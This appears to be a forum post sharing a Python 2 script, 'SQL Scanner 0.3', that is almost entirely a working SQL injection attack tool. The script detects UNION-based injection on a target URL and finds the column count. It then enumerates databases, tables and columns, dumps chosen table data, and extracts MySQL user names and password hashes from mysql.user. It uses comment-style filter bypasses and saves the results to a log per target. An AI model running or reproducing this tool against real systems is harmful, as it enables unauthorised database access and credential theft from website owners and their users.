Guarda todo en un log con el nombre de la web en la carpeta /logs

Código: python


#!usr/bin/python
#SQL Scanner 0.3 (C) Doddy Hackman 2010

import os,sys,urllib2,re,binascii
from urlparse import urlparse

def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")

def savefile(name,text):
 file = open(name,"a")
 file.write("\n"+text+"\n")
 file.close()

def gethost(test):
 return urlparse(test).netloc

def header() : 
 print "\n--== SQL Scanner ==--\n"

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"
 sys.exit(1)

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/*")
 else: 
  return("+","--")


def dumper(web,passx,table,col1,col2):

 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] Values Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)	
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]

    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"



def mysqluser(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]

    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
 
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"    
 else:
  print "[-] Not Found\n" 
 


def showcolumnsdb(web,db,table,passx):
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
  savefile("logs/"+gethost(web)+".txt","[DB] : "+table)
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
    print "[Column Found] : "+column

 else:
  print "[-] Not Found\n"


def showtablesdb(web,db,passx):
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching tables in DB\n\n"
 savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"



def showtables(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"



def showcolumns(tabla,web,passx):
 pass1,pass2 = bypass(passx)
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching tables\n\n"
 savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
 else:
  print "[-] Not Found\n"




def showdbs(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"




def menu(page,bypass):
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n\n"
 print "1 - Show tables\n"
 print "2 - Show columns of the a table\n"
 print "3 - Show databases\n"
 print "4 - Show tables from the a DB\n"
 print "5 - Show columns from the a table of the DB\n"
 print "\n[mysql.user]\n\n"
 print "6 - Show users\n"
 print "\n[Others]\n\n"
 print "7 - Show details\n"
 print "8 - Dump data\n"
 print "9 - Show log\n"
 print "10 - Change target\n"
 print "11 - Exit\n\n"
 try:
  op = input("[Option] : ")
  if op == 1: 
   showtables(page,bypass)
   raw_input()    
   menu(page,bypass)
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 3:
   showdbs(page,bypass)
   raw_input() 
   menu(page,bypass)
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 6:
   mysqluser(page,bypass)
   raw_input()
   menu(page,bypass)
  elif op == 7:
   more(page,bypass)
   raw_input()
   menu(page,bypass)	
  elif op == 8:
   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   raw_input()
   menu(page,bypass)
  elif op == 9:
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 10:
   sta()
 except:
  menu(page,bypass)
 if op == 11:
  copyright()
  
 
def more(web,passx):
 pass1,pass2 = bypass(passx)
 print "\n[+] Searching more data\n"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
   menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

 print "[-] Length dont found\n"
   
    
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
 if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  copyright()


def sta(): 

 clean()
 header()

 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 scan(web,bypasx)

sta()

#The End

Páginas 1 ... 24 25 26 27